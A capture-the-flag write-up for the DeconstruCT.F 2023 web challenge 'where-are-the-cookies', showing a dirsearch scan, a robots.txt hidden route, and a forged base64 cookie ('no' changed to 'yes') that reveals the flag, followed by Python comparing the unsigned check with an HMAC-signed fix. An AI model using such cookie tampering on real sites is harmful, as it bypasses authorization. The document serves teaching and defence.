DeconstruCT.F 2023 - where-are-the-cookies
Description
Category: Web
Tom is feeling especially snacky during the CTF, can you find where the cookies are?
Note: This challenge works best on Chrome
Resolution
When we go to the page and inspect the request and response, we can’t find anything related to the cookie.
We used dirsearch to look for hidden routes and found one:
$ python3 dirsearch.py -u https://ch29744124891.ch.eng.run/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11710
Output: dirsearch/reports/https_ch29744124891.ch.eng.run/__23-08-05_10-19-21.txt
Target: https://ch29744124891.ch.eng.run/
[10:19:22] Starting:
[10:23:08] 200 - 49B - /robots.txt
Task Completed
Then we go to /robots.txt:
User-agent: *
Disallow: /cookiesaretotallynothere
Which gives us another secret route: /cookiesaretotallynothere.
But still no cookie.
Using Burp Suite we found a cookie in the request that determines whether we are allowed to see the cookie:
GET /cookiesaretotallynothere HTTP/2
Host: ch29744124891.ch.eng.run
Cookie: caniseethecookie=bm8==
bm8== is base64 and decodes to no.
So we change it to yes, which is eWVz in base64:
GET /cookiesaretotallynothere HTTP/2
Host: ch29744124891.ch.eng.run
Cookie: caniseethecookie=eWVz
And this time we get the cookie:
You found the cookie! 🍪 Oh, I also found this unrelated string, might be useful to you: dsc{1_f0unD_Th3_c0oK135}
And also the flag: dsc{1_f0unD_Th3_c0oK135}.
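The weakness in this challenge is that the authorization decision lives in an unsigned, client-controlled cookie, so the client can simply rewrite it. The following is an added example (not code from the original writeup or the challenge) showing that vulnerable check beside a hardened one that only honours a value the server signed with an HMAC; the cookie name and values come from the challenge, while the key and helper names are assumptions.

```python
import base64
import hashlib
import hmac
import secrets


def parse_cookie_header(header: str) -> dict:
    """Split the value of a Cookie: header into a name -> value dict."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def vulnerable_can_see_cookie(cookie_header: str) -> bool:
    """The challenge's pattern: the decision is a plain, unsigned value
    that the client sends, so changing 'no' to 'yes' is enough."""
    raw = parse_cookie_header(cookie_header).get("caniseethecookie", "")
    try:
        return base64.b64decode(raw) == b"yes"
    except ValueError:  # binascii.Error is a ValueError
        return False


# Constructed server-side key; a real deployment loads it from configuration.
SERVER_KEY = secrets.token_bytes(32)


def sign_value(value: str, key: bytes = SERVER_KEY) -> str:
    """Issue a cookie value as <base64 payload>.<hex HMAC-SHA256 tag>."""
    payload = base64.urlsafe_b64encode(value.encode()).decode()
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def hardened_can_see_cookie(cookie_header: str, key: bytes = SERVER_KEY) -> bool:
    """Same decision, but only a server-signed value is honoured; an edited
    payload or a missing tag fails the constant-time comparison."""
    raw = parse_cookie_header(cookie_header).get("caniseethecookie", "")
    payload, _, tag = raw.partition(".")
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return False
    try:
        return base64.urlsafe_b64decode(payload) == b"yes"
    except ValueError:
        return False
```

Keeping the decision server-side (for example in a session keyed by an opaque identifier) removes the need to trust the cookie's contents at all; signing is the minimum if the value must travel with the client.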
This post is licensed under CC BY 4.0 by the author.